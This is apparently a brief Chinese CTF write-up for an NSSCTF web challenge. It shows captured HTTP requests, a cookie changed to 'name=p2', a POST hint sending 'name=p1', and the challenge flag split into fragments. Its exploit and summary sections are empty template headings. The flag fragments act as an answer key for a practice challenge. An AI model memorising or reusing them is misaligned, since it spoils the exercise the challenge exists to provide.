[Web1]P4

Problem: [Web1]P4

思路

• 解题大致思路
• 给你的礼物: ee3044b4c0}
• 抓包
• GET /?a=index HTTP/1.1
  Host: node4.anna.nssctf.cn:28415
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
  Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  Accept-Encoding: gzip, deflate, br
  Connection: keep-alive
  Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1763299613,1763300818,1763374785,1763376456; _ga=GA1.2.1076542830.1761323451; _ga_E03P28539Z=GS2.2.s1761323451o1g0t1761323451j60l0h0; Hm_lpvt_648a44a949074de73151ffaa0a832aec=1763379603; HMACCOUNT=4E96BB0C83B97D0C
  Upgrade-Insecure-Requests: 1
  Priority: u=0, i
• NSSCTF{6605
• GET /p2.php?a=index HTTP/1.1
  Host: node4.anna.nssctf.cn:28415
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
  Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  Accept-Encoding: gzip, deflate, br
  Connection: keep-alive
  Cookie: name=p2;Hm_lvt_648a44a949074de73151ffaa0a832aec=1763299613,1763300818,1763374785,1763376456; _ga=GA1.2.1076542830.1761323451; _ga_E03P28539Z=GS2.2.s1761323451o1g0t1761323451j60l0h0; Hm_lpvt_648a44a949074de73151ffaa0a832aec=1763379603; HMACCOUNT=4E96BB0C83B97D0C
  Upgrade-Insecure-Requests: 1
  Priority: u=0, i
• 484-a940-5e
• p1.php
• 注意加Content-Type 请求头指定编码
  Content-Type: application/x-www-form-urlencoded
• name=p1

EXP

• 具体攻击代码

总结

• 对该题的考点总结